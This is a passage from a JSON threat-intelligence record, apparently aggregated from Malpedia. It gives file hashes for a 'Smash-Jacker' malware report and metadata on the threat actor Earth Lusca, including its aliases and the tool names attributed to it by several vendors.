84cde2627fcce642a6ed062a\r\neecb39d2dc5efd9461cdb4d6644057f3c13a9b17d9d0385ddfcae260e9ea70a8\r\nb4ce8670b04dbfd47cad089ef826cb18568896677202b6f255ec1161581eb49c\r\n6ab2311de65c8ec6fa42c01b9cbe8443b16304076e51b005b87aea95e50b5be2\r\nf985cb1e542dd54e54dea13add450fd38208a62dda2bb850468618ca33736f03\r\nreg.bat/reg.xml\r\n935bce606159c44bd2697eced5cae4a6e78505662226de44647a8278d0b65897\r\n10c8a00927ca6d784a0a9d80c85a9252edc514e1851659af67ecd5bcd9d0c6b7\r\ned89a8377e2782212035d3d30d62344a1e2d51c4d0976adb070c7c6eb9d0fc20\r\nbffcc7888901c9b26c192691b32a0aa724c23da987d92904dc808d768c04f690\r\n9d9cb847255137e1f2daf88f4790f01fdff91215c60712fbb88274bd3c95fb87\r\ncf3a292cf651d6363c5f3d21812b240c48657f6c951e779eafaf15fa7ef39972\r\nc44029eeff28e0ca064e379cb929916b659c440da1f5a29855012bd909eaa084\r\n707aa512b5f4fea301b379582a16e5e2b729005562623d9ea729d80d6c98c7d8\r\nExtension Files\r\ncontent.js/service.js/manifest.json/background.js/web.js/apps.crx\r\n0626d33f723c33ed98f9e8c1a78b43510e6dbd196ef91fc0be2633ba73b91649\r\ncc1c1c7aa14ac707f66629095b8e117109660c13511f26d6eeda1e9fdc363ab2\r\n0ade971ae68ae6d818e9837ab8c6d4d603ac0bb3d23aa78a0f5d1b91706e155e\r\n4684f8c339c510e146b89f1fa3274b1475851e06f0c347ab07821846bdb066a4\r\n893fcfe4edcdb07bcc3e05a3304f93f0358c9d8f4cc967058585f553bb82ad02\r\na507d1f546c979056ce392467ede397c94ef854d9b5c7581462feef6e9b091ef\r\n0f9d206423e5e197adf17fe478f0001a6309bf0cd1931b6607b17dc4a2600d28\r\n3003c376b4ddca73cbd7a761c7e19adea52ed056c6c0e6ebecf67ce1a833b061\r\nbeefb9d3af534d2fdd069dbe4b2b72b0e840f1a8bcf676d06746321a73216dd6\r\n639b4aa439b6230d88445db584ce81835a8236c4cc5b0610c8ecc728941693b7\r\n7fd6486432256c15fa6568f04af2db56de31e9aecc16044b3d5b488957a7bcc2\r\nbfb7f6dc266847896a21a8513d639eabf3f74d2a2def95104459ad322b13fac6\r\n092d00e4b89dce6b18c654d9b5af4cdd7c0da2d304f139820efeecaa5c4eb16c\r\n4bcec38345ddc32954a86c529fd1058187e56cc7d576fd767e272a02ba7a97f6\r\nf0097f5ed7261f23aec2434d73295165d708cdfc239c33e6990071119087a495\r\nd5e3087257045d015dd02186cba8427946b174eaaa40f180f3b017ba9d6c8837\r\n85975a9d26e942b1804195c9b5a2afc72fc8faf245af064d81522d0d7d1823f1\r\n092f386c78aef402225279c45d519ea6abfb2ce07a735bb1288529c20b1f5db9\r\n1f462fbc4be05d97a3865014a1af20c8f137828993b59cecfc774193d493653d\r\nSource: https://www.connectwise.com/blog/threat-report/smash-jacker",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.connectwise.com/blog/threat-report/smash-jacker"
	],
	"report_names": [
		"smash-jacker"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434792,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0ecffb74b1a826a46894980463e774ff1aac2978.pdf",
		"text": "https://archive.orkl.eu/0ecffb74b1a826a46894980463e774ff1aac2978.txt",
		"img": "https://archive.orkl.eu/0ecffb74b1a826a46894980463e774ff1aac2978.jpg"
	}
}